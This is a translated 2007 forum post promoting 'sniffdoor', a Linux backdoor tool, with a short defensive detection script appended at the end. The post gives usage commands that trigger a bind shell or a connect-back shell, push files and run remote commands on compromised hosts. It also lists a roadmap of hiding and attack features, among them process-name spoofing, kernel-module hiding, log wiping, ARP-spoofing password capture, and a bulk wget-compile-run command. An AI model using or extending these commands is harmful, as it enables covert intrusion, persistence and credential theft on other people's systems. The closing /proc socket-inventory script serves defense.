Linux sniffdoor v 1.0
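Author: wzt <[email protected]>
Source: Eviloctal Information Security Team (www.eviloctal.com)
Note: this article was first published at www.XSec.org and was later kindly submitted by the original author to the Eviloctal Information Security Team technical forum. Please credit the site of first publication when reposting.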
SniffDoor V 1.0 (c) 2007 by wzt <[email protected]>
+--------------------------------------------------+
Sniffdoor is a Linux backdoor that is woken up by a
special TCP packet. It can bind a shell with a tty, and
it can transfer files inside TCP packets: the server
side sniffs the files out of the special TCP packets
and saves them on the server. The client can also send
a shell command in the packet; the server sniffs and
executes it, so it can get around the firewall.
+--------------------------------------------------+
[USAGE]:
server:
    $ make
    $ ./sniffdoor
client:
    $ make
    $ ./sniffclient

sniffdoor <options> [remote_ip] [port] [command]

<options>:
    -packet  <remote_ip> [port] <command>
    -connect <remote ip> <port>
    -listen  <port>

<command>:
    bind:<port>
    back:<remote_ip> <port>
    file:<filename>
    comm:<command>

1. Bind shell:
   Send a TCP packet to host 61.155.217.56; it then
   binds a shell on port 999.
    ./client -packet 61.155.217.56 bind:999
    ./client -packet 61.155.217.56 22 bind:999
   Port 22 is an active port on the host.

2. Connect-back door:
   1) Your own machine must listen on a port first (your IP
      is 123.45.64.57):
    ./client -listen 999
   2) Send a TCP packet to host 61.155.217.56; it then
      sends a shell back to remote 123.45.64.57 on port 999.
    ./client -packet 61.155.217.56 back:123.45.64.57:999
    ./client -packet 61.155.217.56 21 back:123.45.64.57:999

3. Send file:
   1) Send a file inside TCP packets.
    ./client -packet 61.155.217.56 file:bind.c
    ./client -packet 61.155.217.56 80 file:bind.c
   NOTE!
   It can only send text files, not binary files.
   If you fix this bug, mail me, thanks.

4. Execute command:
   1) Execute a command sent in a TCP packet.
    ./client -packet 61.155.217.56 comm:"gcc -o bind bind.c"
    ./client -packet 61.155.217.56 23 comm:"gcc -o bind bind.c"
+--------------------------------------------------+
[THANKS]:
Thanks to baozi for testing the door all along.
[END]:
Send any bugs to <[email protected]>.
-wzt

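P.S. I have recently been working on an all-in-one for Linux; if anyone has good ideas, discuss them here.
The aim is an all-in-one penetration backdoor: with it we could move from one Linux box into other Linux/Windows hosts, aiming for the point where having sniffdoor in hand is all you need.
I have the following feature suggestions. Please put forward your own ideas, both on major features and on the details of a particular feature, so that we can build a perfect Linux penetration backdoor.
1: htran with udp support: port htran over from Windows, including socks5 (with user/password) --> somewhat difficult, e.g. client sends ip pack -proxy -bind eth0 port user pass --> nearly finished
2: Flexible connect-back settings.
3: Autostart: start via ELF insertion; pay attention to whether the host program still works normally, the name of the infected program, and similar issues.
4: Encrypted communication
5: portscanner with banner grabber
6: logcleaner --> very easy, somewhat necessary, heh, since there are other wipe tools already; of course, having it would be best
7: Bring in ARP spoofing + a network sniffer to capture some cleartext passwords; being able to capture smb would be super strong --> moderate difficulty, fairly necessary; I think the local sniffer can be done first and the ARP part added gradually later
8: Hiding, hiding: the initial plan is to use a fake proc name to fool people, making it -bash, heh; after that write an lkm to hide it, ideally achieving dynamic hiding.
9: Bring in ttysniffer --> extremely difficult, but extremely necessary
10: Merge client and server into one, trim the parameters, and include a cygwin build in the package so it can be used on Windows. Ideally add management of compromised hosts, to make it easy to send commands in bulk later, e.g. wget ip/juno.c;gcc juno.c -o juno ; ./juno www.xxx.com 80 :)
11: httpd……multithreaded……auth, port, directory, index: 4 parameters, heh.

./sniffclient -packet ip bind:9999
will bind port 9999.
./sniffclient -packet ip back:11.22.33.44:9999
sends the shell back to port 9999 on 11.22.33.44.
Both sniffclient and sniffserver require root privileges.
Download (just get it from Eviloctal): sniffdoor.tgz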
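
A host-side check for the mechanism described above, as an added example that is not part of the original post or of sniffdoor: a server that wakes on sniffed TCP packets has to hold a packet or raw socket, which is why it needs root. It assumes the server uses either an AF_PACKET socket or an AF_INET raw TCP socket (the page does not say which); the sample tables, inodes, PIDs and paths are constructed.

```python
import glob, os, re
# Constructed samples in the layout of /proc/net/packet and /proc/net/raw.
SAMPLE_PACKET = """\
sk       RefCnt Type Proto  Iface R Rmem   User   Inode
ffff8880a1b2c000 3      3    0003   2     1 0      0      41522
ffff8880a1b2d000 3      2    888e   3     1 0      0      20311
"""
SAMPLE_RAW = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
   6: 00000000:0006 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 41730 2 ffff8880b0c0d000 0
   1: 00000000:0001 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 19876 2 ffff8880b0c0e000 0
"""

def sniffing_sockets(packet_text, raw_text):
    """Return {inode: reason} for sockets that see TCP segments sent to any port."""
    hits = {}
    for f in (l.split() for l in packet_text.splitlines()[1:]):
        # AF_PACKET socket bound to ETH_P_ALL (0003) or ETH_P_IP (0800)
        if len(f) >= 9 and f[3].lower() in ("0003", "0800"):
            hits[int(f[8])] = "AF_PACKET proto 0x" + f[3]
    for f in (l.split() for l in raw_text.splitlines()[1:]):
        # In /proc/net/raw the "port" in local_address is the IP protocol number
        if len(f) >= 10 and int(f[1].split(":")[1], 16) == 6:
            hits[int(f[9])] = "AF_INET SOCK_RAW IPPROTO_TCP"
    return hits

def socket_owners(proc="/proc"):
    """Map socket inode -> (pid, exe, argv[0]) via /proc/<pid>/fd (run as root)."""
    owners = {}
    for fd in glob.glob(os.path.join(proc, "[0-9]*", "fd", "*")):
        try:
            m = re.fullmatch(r"socket:\[(\d+)\]", os.readlink(fd))
            if m:
                piddir = os.path.dirname(os.path.dirname(fd))
                with open(os.path.join(piddir, "cmdline"), "rb") as fh:
                    argv0 = fh.read().split(b"\0")[0].decode(errors="replace")
                exe = os.readlink(os.path.join(piddir, "exe"))
                owners[int(m.group(1))] = (int(os.path.basename(piddir)), exe, argv0)
        except OSError: continue  # process exited or fd closed while scanning
    return owners

def report(hits, owners):
    """Join sockets with owners; flag argv[0] that does not match the executable."""
    rows = []
    for inode, reason in sorted(hits.items()):
        pid, exe, argv0 = owners.get(inode, (None, "?", "?"))
        renamed = os.path.basename(argv0.lstrip("-")) != os.path.basename(exe)
        rows.append((inode, pid, exe, argv0, reason, renamed))
    return rows
```

On a live host, pass the contents of /proc/net/packet and /proc/net/raw together with the result of socket_owners(); packet capture tools and DHCP clients show up too, so the rows are an inventory to review, with the last column marking a process whose displayed name (such as -bash) does not match its executable. A kernel-module hider of the kind planned in item 8 could defeat a /proc-based check.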

Support.